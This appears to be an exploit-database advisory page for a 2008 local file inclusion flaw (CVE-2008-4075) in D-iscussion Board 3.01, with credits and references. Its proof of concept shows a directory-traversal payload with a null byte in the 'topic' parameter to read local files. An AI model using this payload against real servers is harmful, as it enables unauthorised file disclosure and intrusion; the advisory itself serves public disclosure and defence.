Bug: D-iscussion Board 3.01 (topic) Local File Inclusion Vulnerability (WLB-2008090120 Ascii Version)

English Version
WLB2

CVE WLB2

 Topic: D-iscussion Board 3.01 (topic) Local File Inclusion Vulnerability
 Credit: SirGod
 Date: 2008.09.16
 CWE: CWE-22 (Show similar)
 CVE: CVE-2008-4075 (Show details)

Use CVE to see details like:
- CVSS2,
- Affected Software,
- References

Risk
Local
Remote
Medium
No
Yes

############################################################################################################
[+] D-iscussion Board 3.01 Local File Inclusion
[+] Discovered By SirGod
[+] MorTal TeaM
[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,str0ke
############################################################################################################

Download : http://dino.shiftedphase.com/comp/downloads/forum.zip

[+] Local File Inclusion


PoC :

http://[target]/[path]/general/index.php?topic=[LocalFile]%00

Example :

http://127.0.0.1/3.01/general/index.php?topic=../../../../autoexec.bat%00

############################################################################################################

References:

http://xforce.iss.net/xforce/xfdb/45063
http://www.securityfocus.com/bid/31135
http://www.milw0rm.com/exploits/6430

[ ASCII VERSION ]

Copyright 2012, cxsecurity.com